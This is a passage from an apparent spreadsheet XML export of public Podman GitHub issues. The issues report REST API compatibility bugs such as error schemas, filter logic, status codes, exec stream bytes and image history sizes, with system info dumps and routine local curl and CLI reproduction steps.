1.0.0 +SYSTEMD +SELINUX +APPARMOR +CAP +SECCOMP +EBPF +CRIU +LIBKRUN +WASM:wasmedge +YAJL os: linux remoteSocket: exists: true path: /run/user/501/podman/podman.sock security: apparmorEnabled: false capabilities: CAP_CHOWN,CAP_DAC_OVERRIDE,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_NET_BIND_SERVICE,CAP_SETFCAP,CAP_SETGID,CAP_SETPCAP,CAP_SETUID,CAP_SYS_CHROOT rootless: true seccompEnabled: true seccompProfilePath: /usr/share/containers/seccomp.json selinuxEnabled: true serviceIsRemote: true slirp4netns: executable: /usr/bin/slirp4netns package: slirp4netns-1.2.0-12.fc38.aarch64 version: |- slirp4netns version 1.2.0 commit: 656041d45cfca7a4176f6b7eed9e4fe6c11e8383 libslirp: 4.7.0 SLIRP_CONFIG_VERSION_MAX: 4 libseccomp: 2.5.3 swapFree: 0 swapTotal: 0 uptime: 0h 53m 21.00s plugins: authorization: null log: - k8s-file - none - passthrough - journald network: - bridge - macvlan - ipvlan volume: - local registries: search: - docker.io store: configFile: /var/home/core/.config/containers/storage.conf containerStore: number: 8 paused: 0 running: 1 stopped: 7 graphDriverName: overlay graphOptions: {} graphRoot: /var/home/core/.local/share/containers/storage graphRootAllocated: 106769133568 graphRootUsed: 6792806400 graphStatus: Backing Filesystem: xfs Native Overlay Diff: "true" Supports d_type: "true" Using metacopy: "false" imageCopyTmpDir: /var/tmp imageStore: number: 69 runRoot: /run/user/501/containers transientStore: false volumePath: /var/home/core/.local/share/containers/storage/volumes version: APIVersion: 4.5.0 Built: 1681486872 BuiltTime: Fri Apr 14 17:41:12 2023 GitCommit: "" GoVersion: go1.20.2 Os: linux OsArch: linux/arm64 Version: 4.5.0   Podman in a container No  Privileged Or Rootless None  Upstream Latest Release Yes  Additional environment details Additional environment details  Additional information similar looking * https://github.com/containers/podman/issues/13578</t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/19159</t>
  </si>
  <si>
    <t>New podman pod remove API error message is less detailed</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Description In 4.6.0-rc1 the `libpods/pod` DELETE endpoint's error message changed to: ![image](https://github.com/containers/podman/assets/67428/09887439-128b-42be-92bb-7b9da3b92dcf) From: ![image](https://github.com/containers/podman/assets/67428/8dd91399-3241-451e-8ef2-c7ee13b38979) The new error message does not include anything about it being unable delete running/paused containers.  Steps to reproduce the issue Steps to reproduce the issue  [root@fedora-testing-127-0-0-2-2201 ~]# podman pod ps POD ID NAME STATUS CREATED INFRA ID # OF CONTAINERS 64ec75433156 brave_solomon Running 24 minutes ago c168e97d7e68 2 [root@fedora-testing-127-0-0-2-2201 ~]# curl -X DELETE -s -g --no-buffer --unix-socket /run/podman/podman.sock 'http://localhost/v1.12/libpod/pods/64ec75433156' {"cause":"removing pod containers","message":"not all containers could be removed from pod 64ec754331564082b0ccbf078268d701ad009a415ad1dfdaca64425cbe8d8821: removing pod containers","response":500}   Describe the results you received See above :)  Describe the results you expected I'm wondering if the error should inform that the container is running/paused so requires force to be removed.  podman info output  Podman in a container No  Privileged Or Rootless None  Upstream Latest Release Yes  Additional environment details Additional environment details  Additional information Additional information like issue happens only occasionally or issue happens with a particular architecture or on a particular setting</t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/19219</t>
  </si>
  <si>
    <t>Multiple filter options do not act as logical AND for volume ls</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Description Proximately the same issue as was described for `ps` in containers/podman#1341 Using multiple `--filter` option on volumes is an `OR` but should be `AND`.  Steps to reproduce the issue Steps to reproduce the issue: 1. Create test volumes using the follow commands 2. Query volumes using multiple filters  [root@localhost tmp]# docker volume create --label a=b --label b=a podman-test-a Emulate Docker CLI using podman. Create /etc/containers/nodocker to quiet msg. podman-test-a [root@localhost tmp]# docker volume create --label a=b --label c=d podman-test-b Emulate Docker CLI using podman. Create /etc/containers/nodocker to quiet msg. podman-test-b [root@localhost tmp]# docker volume create --label c=d --label e=f podman-test-c Emulate Docker CLI using podman. Create /etc/containers/nodocker to quiet msg. podman-test-c [root@localhost tmp]#  Query with compound filters:  [root@localhost tmp]# docker volume ls -q --filter label=a=b --filter label=c=d Emulate Docker CLI using podman. Create /etc/containers/nodocker to quiet msg. podman-test-a podman-test-b podman-test-c [root@localhost tmp]#   Describe the results you received Lists all volumes matching either label  [root@localhost tmp]# docker volume ls -q --filter label=a=b --filter label=c=d Emulate Docker CLI using podman. Create /etc/containers/nodocker to quiet msg. podman-test-a podman-test-b podman-test-c [root@localhost tmp]#   Describe the results you expected Lists only the volumes matching _all_ the specified filters:  [root@localhost tmp]# docker volume ls -q --filter label=a=b --filter label=c=d Emulate Docker CLI using podman. Create /etc/containers/nodocker to quiet msg. podman-test-b [root@localhost tmp]#   podman info output yaml host: arch: amd64 buildahVersion: 1.29.0 cgroupControllers: - cpuset - cpu - cpuacct - blkio - memory - devices - freezer - net_cls - perf_event - net_prio - hugetlb - pids - rdma cgroupManager: cgroupfs cgroupVersion: v1 conmon: package: conmon-2.1.5-1.fc36.x86_64 path: /usr/bin/conmon version: 'conmon version 2.1.5, commit: ' cpuUtilization: idlePercent: 99.78 systemPercent: 0.02 userPercent: 0.19 cpus: 8 distribution: distribution: fedora variant: container version: "36" eventLogger: file hostname: localhost idMappings: gidmap: null uidmap: null kernel: 5.10.102.1-microsoft-standard-WSL2 linkmode: dynamic logDriver: k8s-file memFree: 1144238080 memTotal: 8190472192 networkBackend: netavark ociRuntime: name: crun package: crun-1.8.1-1.fc36.x86_64 path: /usr/bin/crun version: |- crun version 1.8.1 commit: f8a096be060b22ccd3d5f3ebe44108517fbf6c30 rundir: /root/.run/containers/crun spec: 1.0.0 +SYSTEMD +SELINUX +APPARMOR +CAP +SECCOMP +EBPF +CRIU +WASM:wasmedge +YAJL os: linux remoteSocket: path: /run/podman/podman.sock security: apparmorEnabled: false capabilities: CAP_NET_RAW,CAP_CHOWN,CAP_DAC_OVERRIDE,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_NET_BIND_SERVICE,CAP_SETFCAP,CAP_SETGID,CAP_SETPCAP,CAP_SETUID,CAP_SYS_CHROOT rootless: false seccompEnabled: true seccompProfilePath: /usr/share/containers/seccomp.json selinuxEnabled: false serviceIsRemote: false slirp4netns: executable: /usr/bin/slirp4netns package: slirp4netns-1.2.0-0.2.beta.0.fc36.x86_64 version: |- slirp4netns version 1.2.0-beta.0 commit: 477db14a24ff1a3de3a705e51ca2c4c1fe3dda64 libslirp: 4.6.1 SLIRP_CONFIG_VERSION_MAX: 3 libseccomp: 2.5.3 swapFree: 2147483648 swapTotal: 2147483648 uptime: 166h 12m 0.00s (Approximately 6.92 days) plugins: authorization: null log: - k8s-file - none - passthrough - journald network: - bridge - macvlan volume: - local registries: search: - registry.fedoraproject.org - registry.access.redhat.com - docker.io - quay.io store: configFile: /etc/containers/storage.conf containerStore: number: 4 paused: 0 running: 2 stopped: 2 graphDriverName: overlay graphOptions: overlay.mount_program: Executable: /usr/bin/fuse-overlayfs Package: fuse-overlayfs-1.9-6.fc36.x86_64 Version: |- fusermount3 version: 3.10.5 fuse-overlayfs: version 1.9 FUSE library version 3.10.5 using FUSE kernel interface version 7.31 overlay.mountopt: nodev,metacopy=on graphRoot: /var/lib/containers/storage graphRootAllocated: 269490393088 graphRootUsed: 14522699776 graphStatus: Backing Filesystem: extfs Native Overlay Diff: "false" Supports d_type: "true" Using metacopy: "false" imageCopyTmpDir: /var/tmp imageStore: number: 5 runRoot: /run/containers/storage transientStore: false volumePath: /var/lib/containers/storage/volumes version: APIVersion: 4.4.1 Built: 1676629882 BuiltTime: Fri Feb 17 02:31:22 2023 GitCommit: "" GoVersion: go1.18.10 Os: linux OsArch: linux/amd64 Version: 4.4.1   Podman in a container No  Privileged Or Rootless Privileged  Upstream Latest Release No  Additional environment details WSL environment created using podman-machine  Additional information Additional information like issue happens only occasionally or issue happens with a particular architecture or on a particular setting</t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/19280</t>
  </si>
  <si>
    <t>Why am I receiving random bytes over podman.socket</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Description I sometimes receive a sequence like this: `\SOH\NUL\NUL\NUL\NUL\NUL\NULb` which breaks the json that my script in the exec is outputting. My first workaround was to throw away the first 8 bytes but this then reoccurs later in the stream.  Steps to reproduce the issue Steps to reproduce the issue 1. send  POST /containers/{cid}/exec HTTP/1.1 Host: localhost User-Agent: something Content-Type: application/json Content-Length: 196 {"AttachStderr":true,"AttachStdin":false,"AttachStdout":true,"Cmd":["/bin/bash","-c","ls"],"DetachKeys":"ctrl-a","Logs":false,"Stream":true,"Tty":false,"User":"root","WorkingDir":"/tmp/compiling"}  2. send  POST /exec/{responseIdFromStep1}/start HTTP/1.1 Host: localhost User-Agent: esystant Content-Type: application/json Content-Length: 27 {"Detach":false,"Tty":true}  3. Observe weird bytes prepended. 4. I've also noticed that after reading a lot of bytes, this re-occurs.  Describe the results you received This is what I get: [file1.txt](https://github.com/containers/podman/files/12089248/file1.txt)  Describe the results you expected This is what I expect to get: [file1.txt](https://github.com/containers/podman/files/12089250/file1.txt)  podman info output yaml host: arch: amd64 buildahVersion: 1.30.0 cgroupControllers: - cpu - memory - pids cgroupManager: systemd cgroupVersion: v2 conmon: package: /usr/bin/conmon is owned by conmon 1:2.1.7-1 path: /usr/bin/conmon version: 'conmon version 2.1.7, commit: f633919178f6c8ee4fb41b848a056ec33f8d707d' cpuUtilization: idlePercent: 97.19 systemPercent: 0.4 userPercent: 2.41 cpus: 12 databaseBackend: boltdb distribution: distribution: arch version: unknown eventLogger: journald hostname: arch idMappings: gidmap: - container_id: 0 host_id: 1000 size: 1 - container_id: 1 host_id: 100000 size: 65536 uidmap: - container_id: 0 host_id: 1000 size: 1 - container_id: 1 host_id: 100000 size: 65536 kernel: 6.4.3-arch1-2 linkmode: dynamic logDriver: journald memFree: 10285826048 memTotal: 33556062208 networkBackend: netavark ociRuntime: name: crun package: /usr/bin/crun is owned by crun 1.8.5-1 path: /usr/bin/crun version: |- crun version 1.8.5 commit: b6f80f766c9a89eb7b1440c0a70ab287434b17ed rundir: /run/user/1000/crun spec: 1.0.0 +SYSTEMD +SELINUX +APPARMOR +CAP +SECCOMP +EBPF +CRIU +YAJL os: linux remoteSocket: exists: true path: /run/user/1000/podman/podman.sock security: apparmorEnabled: false capabilities: CAP_CHOWN,CAP_DAC_OVERRIDE,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_NET_BIND_SERVICE,CAP_SETFCAP,CAP_SETGID,CAP_SETPCAP,CAP_SETUID,CAP_SYS_CHROOT rootless: true seccompEnabled: true seccompProfilePath: /etc/containers/seccomp.json selinuxEnabled: false serviceIsRemote: false slirp4netns: executable: /usr/bin/slirp4netns package: /usr/bin/slirp4netns is owned by slirp4netns 1.2.0-1 version: |- slirp4netns version 1.2.0 commit: 656041d45cfca7a4176f6b7eed9e4fe6c11e8383 libslirp: 4.7.0 SLIRP_CONFIG_VERSION_MAX: 4 libseccomp: 2.5.4 swapFree: 8589668352 swapTotal: 8589930496 uptime: 11h 28m 53.00s (Approximately 0.46 days) plugins: authorization: null log: - k8s-file - none - passthrough - journald network: - bridge - macvlan - ipvlan volume: - local registries: search: - docker.io store: configFile: /home/merlijn/.config/containers/storage.conf containerStore: number: 5 paused: 0 running: 2 stopped: 3 graphDriverName: overlay graphOptions: {} graphRoot: /home/merlijn/.local/share/containers/storage graphRootAllocated: 973837332480 graphRootUsed: 832484134912 graphStatus: Backing Filesystem: extfs Native Overlay Diff: "false" Supports d_type: "true" Using metacopy: "false" imageCopyTmpDir: /var/tmp imageStore: number: 33 runRoot: /run/user/1000/containers transientStore: false volumePath: /home/merlijn/.local/share/containers/storage/volumes version: APIVersion: 4.5.1 Built: 1685139594 BuiltTime: Sat May 27 00:19:54 2023 GitCommit: 9eef30051c83f62816a1772a743e5f1271b196d7-dirty GoVersion: go1.20.4 Os: linux OsArch: linux/amd64 Version: 4.5.1   Podman in a container No  Privileged Or Rootless None  Upstream Latest Release No  Additional environment details Arch linux  Additional information I used `nc -U /run/user/1000/podman/podman.sock &gt; file1.txt 2&gt;&amp;1` to send the http command and create the output files</t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/19368</t>
  </si>
  <si>
    <t>Container kill does not return 409 error code for stopped containers</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Description podman kill ( compat / libpod ) does not return 409 error code ( https://docs.docker.com/engine/api/v1.43/#tag/Container/operation/ContainerKill ) for stopped containers  Steps to reproduce the issue Steps to reproduce the issue 1. podman -r run -d --name nginx nginx 2. podman -r stop nginx 3. podman -r kill nginx  Describe the results you received  {"cause":"container state improper","message":"can only kill running containers. 6830d229c01064f76b9de62b76b80492fe4d08136c7b459bc0de926b1581093f is in state exited: container state improper","response":500}   Describe the results you expected 409 is returned  podman info output yaml 4.6.0   Podman in a container No  Privileged Or Rootless None  Upstream Latest Release Yes  Additional environment details Additional environment details  Additional information _No response_</t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/20013</t>
  </si>
  <si>
    <t>docker rest api compatibility not honored for error responses.</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Description It seems that the compatibility with the api rest of docker is not met for error responses. According to the docker docs, the response should include a field "message" but podman has a different schema. This can be reproduced easily running a request to pull an image, for example. As consequence, clients like the official python library for docker doesn't work because the response has a different schema (the message is inside "errordetail") and the library expects to have a "message" key at the root level as is described in the docs. Docker docs ref: https://docs.docker.com/engine/api/v1.43/#tag/Image/operation/ImageCreate Example of podman response  curl -XPOST "http://localhost:8888/images/create?fromImage=quay.io/idonotexist/idonotexist:dummy" | jq { "progressDetail": {}, "errorDetail": { "message": "initializing source docker://quay.io/idonotexist/idonotexist:dummy: reading manifest dummy in quay.io/idonotexist/idonotexist: unauthorized: access to the requested resource is not authorized" }, "error": "initializing source docker://quay.io/idonotexist/idonotexist:dummy: reading manifest dummy in quay.io/idonotexist/idonotexist: unauthorized: access to the requested resource is not authorized" }  Tested with latest podman container 4.6.1  Steps to reproduce the issue  curl -XPOST "http://localhost:8888/images/create?fromImage=quay.io/idonotexist/idonotexist:dummy"   Describe the results you received The response doesn't meet the spec of docker api response, don't have a "message" key in the root level  Describe the results you expected a "message" key in the root level with the reason of the error.  podman info output yaml podman v4.6.1   Podman in a container Yes  Privileged Or Rootless Privileged  Upstream Latest Release Yes  Additional environment details _No response_  Additional information _No response_</t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/20375</t>
  </si>
  <si>
    <t>REST API: `/v1.24/images/${img}/history` contains `"Size":0` where docker has `"Size":7458929`</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Description REST API: Result from `/v1.24/images/${img}/history` contains `"Size":0` where docker has `"Size":7458929`  Steps to reproduce the issue On Fedora CoreOS 39.20231006.1.0 (aarch64) VM perform the following steps: 1. `sudo -i` 2. `systemctl start docker` 3. `useradd test` 4. `usermod -aG docker` 5. `machinectl shell --uid test` 6. `img=$(podman pull alpine:3.17.2)` 7. `docker pull alpine:3.17.2` 8. `systemctl --user start podman.socket` 9. `curl -s --unix-socket /var/run/docker.sock http://localhost/v1.24/images/${img}/history &gt; docker-result.txt` 10. `curl -s --unix-socket $XDG_RUNTIME_DIR/podman/podman.sock http://localhost/v1.24/images/${img}/history &gt; podman-result.txt` 11. `cat result-docker.txt | jq '.[1].Size'` 12. `cat result-podman.txt | jq '.[1].Size'`  Describe the results you received Step 11:  $ cat result-docker.txt | jq '.[1].Size' 7458929  Step 12:  $ cat result-podman.txt | jq '.[1].Size' 0   Describe the results you expected I expected to see the same number in both __Step 11__ and __Step 12__  podman info output yaml host: arch: arm64 buildahVersion: 1.32.0 cgroupControllers: - cpu - memory - pids cgroupManager: systemd cgroupVersion: v2 conmon: package: conmon-2.1.7-3.fc39.aarch64 path: /usr/bin/conmon version: 'conmon version 2.1.7, commit: ' cpuUtilization: idlePercent: 97.6 systemPercent: 1.37 userPercent: 1.03 cpus: 1 databaseBackend: boltdb distribution: distribution: fedora variant: coreos version: "39" eventLogger: journald freeLocks: 2048 hostname: localhost.localdomain idMappings: gidmap: - container_id: 0 host_id: 1011 size: 1 - container_id: 1 host_id: 1245184 size: 65536 uidmap: - container_id: 0 host_id: 1011 size: 1 - container_id: 1 host_id: 1245184 size: 65536 kernel: 6.5.5-300.fc39.aarch64 linkmode: dynamic logDriver: journald memFree: 1244913664 memTotal: 1980260352 networkBackend: netavark networkBackendInfo: backend: netavark dns: package: aardvark-dns-1.7.0-2.fc39.aarch64 path: /usr/libexec/podman/aardvark-dns version: aardvark-dns 1.7.0 package: netavark-1.7.0-2.fc39.aarch64 path: /usr/libexec/podman/netavark version: netavark 1.7.0 ociRuntime: name: crun package: crun-1.9.2-1.fc39.aarch64 path: /usr/bin/crun version: |- crun version 1.9.2 commit: 35274d346d2e9ffeacb22cc11590b0266a23d634 rundir: /run/user/1011/crun spec: 1.0.0 +SYSTEMD +SELINUX +APPARMOR +CAP +SECCOMP +EBPF +CRIU +LIBKRUN +WASM:wasmedge +YAJL os: linux pasta: executable: /usr/bin/pasta package: passt-0^20230908.g05627dc-1.fc39.aarch64 version: | pasta 0^20230908.g05627dc-1.fc39.aarch64-pasta Copyright Red Hat GNU General Public License, version 2 or later &lt;https://www.gnu.org/licenses/old-licenses/gpl-2.0.html&gt; This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. remoteSocket: exists: true path: /run/user/1011/podman/podman.sock security: apparmorEnabled: false capabilities: CAP_CHOWN,CAP_DAC_OVERRIDE,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_NET_BIND_SERVICE,CAP_SETFCAP,CAP_SETGID,CAP_SETPCAP,CAP_SETUID,CAP_SYS_CHROOT rootless: true seccompEnabled: true seccompProfilePath: /usr/share/containers/seccomp.json selinuxEnabled: true serviceIsRemote: false slirp4netns: executable: /usr/bin/slirp4netns package: slirp4netns-1.2.1-1.fc39.aarch64 version: |- slirp4netns version 1.2.1 commit: 09e31e92fa3d2a1d3ca261adaeb012c8d75a8194 libslirp: 4.7.0 SLIRP_CONFIG_VERSION_MAX: 4 libseccomp: 2.5.3 swapFree: 0 swapTotal: 0 uptime: 0h 27m 34.00s plugins: authorization: null log: - k8s-file - none - passthrough - journald network: - bridge - macvlan - ipvlan volume: - local registries: search: - registry.fedoraproject.org - registry.access.redhat.com - docker.io - quay.io store: configFile: /var/home/test11/.config/containers/storage.conf containerStore: number: 0 paused: 0 running: 0 stopped: 0 graphDriverName: overlay graphOptions: {} graphRoot: /var/home/test11/.local/share/containers/storage graphRootAllocated: 24091013120 graphRootUsed: 7668953088 graphStatus: Backing Filesystem: xfs Native Overlay Diff: "true" Supports d_type: "true" Supports shifting: "false" Supports volatile: "true" Using metacopy: "false" imageCopyTmpDir: /var/tmp imageStore: number: 1 runRoot: /run/user/1011/containers transientStore: false volumePath: /var/home/test11/.local/share/containers/storage/volumes version: APIVersion: 4.7.0 Built: 1695838660 BuiltTime: Wed Sep 27 18:17:40 2023 GitCommit: "" GoVersion: go1.21.1 Os: linux OsArch: linux/arm64 Version: 4.7.0   Podman in a container No  Privileged Or Rootless Rootless  Upstream Latest Release Yes  Additional environment details  $ rpm -q podman podman-4.7.0-1.fc39.aarch64 $ rpm -q moby-engine moby-engine-24.0.5-1.fc39.aarch64 $   Additional information The whole result from the REST API calls above.  $ cat result-docker.txt | jq . [ { "Comment": "", "Created": 1676064248, "CreatedBy": "/bin/sh -c #(nop) CMD [\"/bin/sh\"]", "Id": "sha256:d74e625d91152966d38fe8a62c60daadb96d4b94c1a366de01fab5f334806239", "Size": 0, "Tags": [ "alpine:3.17.2" ] }, { "Comment": "", "Created": 1676064248, "CreatedBy": "/bin/sh -c #(nop) ADD file:9bd9ea42a9f3bdc769e80c6b8a4b117d65f73ae68e155a6172a1184e7ac8bcc1 in / ", "Id": "&lt;missing&gt;", "Size": 7458929, "Tags": null } ]   $ cat result-podman.txt | jq . [ { "Id": "sha256:d74e625d91152966d38fe8a62c60daadb96d4b94c1a366de01fab5f334806239", "Created": 1676064248, "CreatedBy": "/bin/sh -c #(nop) CMD [\"/bin/sh\"]", "Tags": [ "docker.io/library/alpine:3.17.2" ], "Size": 0, "Comment": "" }, { "Id": "sha256:&lt;missing&gt;", "Created": 1676064248, "CreatedBy": "/bin/sh -c #(nop) ADD file:9bd9ea42a9f3bdc769e80c6b8a4b117d65f73ae68e155a6172a1184e7ac8bcc1 in / ", "Tags": null, "Size": 0, "Comment": "" } ] </t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/20469</t>
  </si>
  <si>
    <t>Error when use "image prune --all" via forwarding API and docker cli</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Description If an image exists in Podman that is no longer in use and the command "docker image prune -a" is executed via the Forward API and Docker CLI, the error message "Error response from daemon: specifying "dangling" filter more than once with different values is not supported" appears. If the command is executed via "podman image prune -a", the cleanup works correctly.  Steps to reproduce the issue Steps to reproduce the issue 1. Download Image `docker pull nginx` 2. Clean Images `docker image prune -a`  Describe the results you received Error Message: Error response from daemon: specifying "dangling" filter more than once with different values is not supported  Describe the results you expected The image should be removed.  podman info output yaml host: arch: amd64 buildahVersion: 1.32.0 cgroupControllers: - cpuset - cpu - cpuacct - blkio - memory - devices - freezer - net_cls - perf_event - net_prio - hugetlb - pids - rdma - misc cgroupManager: cgroupfs cgroupVersion: v1 conmon: package: conmon-2.1.7-2.fc38.x86_64 path: /usr/bin/conmon version: 'conmon version 2.1.7, commit: ' cpuUtilization: idlePercent: 99.64 systemPercent: 0.2 userPercent: 0.15 cpus: 4 databaseBackend: boltdb distribution: distribution: fedora variant: container version: "38" eventLogger: journald freeLocks: 2048 hostname: VGENERAL96 idMappings: gidmap: null uidmap: null kernel: 5.15.133.1-microsoft-standard-WSL2 linkmode: dynamic logDriver: journald memFree: 7665016832 memTotal: 10413207552 networkBackend: netavark networkBackendInfo: backend: netavark dns: package: aardvark-dns-1.8.0-1.fc38.x86_64 path: /usr/libexec/podman/aardvark-dns version: aardvark-dns 1.8.0 package: netavark-1.8.0-2.fc38.x86_64 path: /usr/libexec/podman/netavark version: netavark 1.8.0 ociRuntime: name: crun package: crun-1.10-1.fc38.x86_64 path: /usr/bin/crun version: |- crun version 1.10 commit: c053c83c57551bca13ead8600237341818975974 rundir: /run/crun spec: 1.0.0 +SYSTEMD +SELINUX +APPARMOR +CAP +SECCOMP +EBPF +CRIU +LIBKRUN +WASM:wasmedge +YAJL os: linux pasta: executable: /usr/bin/pasta package: passt-0^20231004.gf851084-1.fc38.x86_64 version: | pasta 0^20231004.gf851084-1.fc38.x86_64 Copyright Red Hat GNU General Public License, version 2 or later &lt;https://www.gnu.org/licenses/old-licenses/gpl-2.0.html&gt; This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. remoteSocket: exists: true path: /run/podman/podman.sock security: apparmorEnabled: false capabilities: CAP_CHOWN,CAP_DAC_OVERRIDE,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_NET_BIND_SERVICE,CAP_SETFCAP,CAP_SETGID,CAP_SETPCAP,CAP_SETUID,CAP_SYS_CHROOT rootless: false seccompEnabled: true seccompProfilePath: /usr/share/containers/seccomp.json selinuxEnabled: false serviceIsRemote: true slirp4netns: executable: /usr/bin/slirp4netns package: slirp4netns-1.2.2-1.fc38.x86_64 version: |- slirp4netns version 1.2.2 commit: 0ee2d87523e906518d34a6b423271e4826f71faf libslirp: 4.7.0 SLIRP_CONFIG_VERSION_MAX: 4 libseccomp: 2.5.3 swapFree: 3221225472 swapTotal: 3221225472 uptime: 2h 34m 17.00s (Approximately 0.08 days) plugins: authorization: null log: - k8s-file - none - passthrough - journald network: - bridge - macvlan - ipvlan volume: - local registries: search: - docker.io store: configFile: /usr/share/containers/storage.conf containerStore: number: 0 paused: 0 running: 0 stopped: 0 graphDriverName: overlay graphOptions: overlay.mountopt: nodev,metacopy=on graphRoot: /var/lib/containers/storage graphRootAllocated: 1081101176832 graphRootUsed: 2787717120 graphStatus: Backing Filesystem: extfs Native Overlay Diff: "false" Supports d_type: "true" Supports shifting: "false" Supports volatile: "true" Using metacopy: "true" imageCopyTmpDir: /var/tmp imageStore: number: 47 runRoot: /run/containers/storage transientStore: false volumePath: /var/lib/containers/storage/volumes version: APIVersion: 4.7.0 Built: 1695839078 BuiltTime: Wed Sep 27 20:24:38 2023 GitCommit: "" GoVersion: go1.20.8 Os: linux OsArch: linux/amd64 Version: 4.7.0   Podman in a container No  Privileged Or Rootless Privileged  Upstream Latest Release Yes  Additional environment details OS: Windows 2022 WSL version: 2.0.6.0 Kernel version: 5.15.133.1-1 WSLg version: 1.0.59 MSRDC version: 1.2.4677 Direct3D version: 1.611.1-81528511 DXCore version: 10.0.25880.1000-230602-1350.main Windows version: 10.0.20348.1787 Podman Version: 4.7.1 Docker CLI Version 24.0.6, build ed223bc</t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/20821</t>
  </si>
  <si>
    <t>Unmarshalling error when using `podman exec`</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Description When I use `podman exec ` for any container, I get the following error:  Error: unmarshalling error into &amp;errorhandling.ErrorModel{Because:"", Message:"", ResponseCode:0}, data "Not Found\n": invalid character 'N' looking for beginning of value   Steps to reproduce the issue Steps to reproduce the issue 1. Run a detached container: `podman run --name httpd -p 8080:80 -d -i -t docker.io/library/httpd` 2. Try to run podman exec: `podman exec httpd pwd` 3. Error message shows up  Describe the results you received An unexpected error message.  Describe the results you expected No error message, if the command is run correctly.  podman info output yaml host: arch: arm64 buildahVersion: 1.32.0 cgroupControllers: - cpu - io - memory - pids cgroupManager: systemd cgroupVersion: v2 conmon: package: conmon-2.1.8-2.fc39.aarch64 path: /usr/bin/conmon version: 'conmon version 2.1.8, commit: ' cpuUtilization: idlePercent: 99.33 systemPercent: 0.34 userPercent: 0.33 cpus: 4 databaseBackend: boltdb distribution: distribution: fedora variant: coreos version: "39" eventLogger: journald freeLocks: 2039 hostname: localhost.localdomain idMappings: gidmap: - container_id: 0 host_id: 1000 size: 1 - container_id: 1 host_id: 100000 size: 1000000 uidmap: - container_id: 0 host_id: 501 size: 1 - container_id: 1 host_id: 100000 size: 1000000 kernel: 6.5.11-300.fc39.aarch64 linkmode: dynamic logDriver: journald memFree: 3151986688 memTotal: 6189867008 networkBackend: netavark networkBackendInfo: backend: netavark dns: package: aardvark-dns-1.8.0-1.fc39.aarch64 path: /usr/libexec/podman/aardvark-dns version: aardvark-dns 1.8.0 package: netavark-1.8.0-2.fc39.aarch64 path: /usr/libexec/podman/netavark version: netavark 1.8.0 ociRuntime: name: crun package: crun-1.11.1-1.fc39.aarch64 path: /usr/bin/crun version: |- crun version 1.11.1 commit: 1084f9527c143699b593b44c23555fb3cc4ff2f3 rundir: /run/user/501/crun spec: 1.0.0 +SYSTEMD +SELINUX +APPARMOR +CAP +SECCOMP +EBPF +CRIU +LIBKRUN +WASM:wasmedge +YAJL os: linux pasta: executable: /usr/bin/pasta package: passt-0^20231004.gf851084-1.fc39.aarch64 version: | pasta 0^20231004.gf851084-1.fc39.aarch64-pasta Copyright Red Hat GNU General Public License, version 2 or later &lt;https://www.gnu.org/licenses/old-licenses/gpl-2.0.html&gt; This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. remoteSocket: exists: true path: /run/user/501/podman/podman.sock security: apparmorEnabled: false capabilities: CAP_CHOWN,CAP_DAC_OVERRIDE,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_NET_BIND_SERVICE,CAP_SETFCAP,CAP_SETGID,CAP_SETPCAP,CAP_SETUID,CAP_SYS_CHROOT rootless: true seccompEnabled: true seccompProfilePath: /usr/share/containers/seccomp.json selinuxEnabled: true serviceIsRemote: true slirp4netns: executable: /usr/bin/slirp4netns package: slirp4netns-1.2.2-1.fc39.aarch64 version: |- slirp4netns version 1.2.2 commit: 0ee2d87523e906518d34a6b423271e4826f71faf libslirp: 4.7.0 SLIRP_CONFIG_VERSION_MAX: 4 libseccomp: 2.5.3 swapFree: 0 swapTotal: 0 uptime: 12h 26m 50.00s (Approximately 0.50 days) variant: "" plugins: authorization: null log: - k8s-file - none - passthrough - journald network: - bridge - macvlan - ipvlan volume: - local registries: search: - docker.io store: configFile: /var/home/core/.config/containers/storage.conf containerStore: number: 3 paused: 0 running: 3 stopped: 0 graphDriverName: overlay graphOptions: {} graphRoot: /var/home/core/.local/share/containers/storage graphRootAllocated: 106769133568 graphRootUsed: 6775140352 graphStatus: Backing Filesystem: xfs Native Overlay Diff: "true" Supports d_type: "true" Supports shifting: "false" Supports volatile: "true" Using metacopy: "false" imageCopyTmpDir: /var/tmp imageStore: number: 33 runRoot: /run/user/501/containers transientStore: false volumePath: /var/home/core/.local/share/containers/storage/volumes version: APIVersion: 4.7.2 Built: 1698762633 BuiltTime: Tue Oct 31 15:30:33 2023 GitCommit: "" GoVersion: go1.21.1 Os: linux OsArch: linux/arm64 Version: 4.7.2   Podman in a container No  Privileged Or Rootless None  Upstream Latest Release Yes  Additional environment details ZSH on MacOS  Additional information When downgrading to v4.7.2 the issue disappeared.</t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/21311</t>
  </si>
  <si>
    <t>Network connect/disconnect events don't include network ID/name</t>
  </si>
  <si>
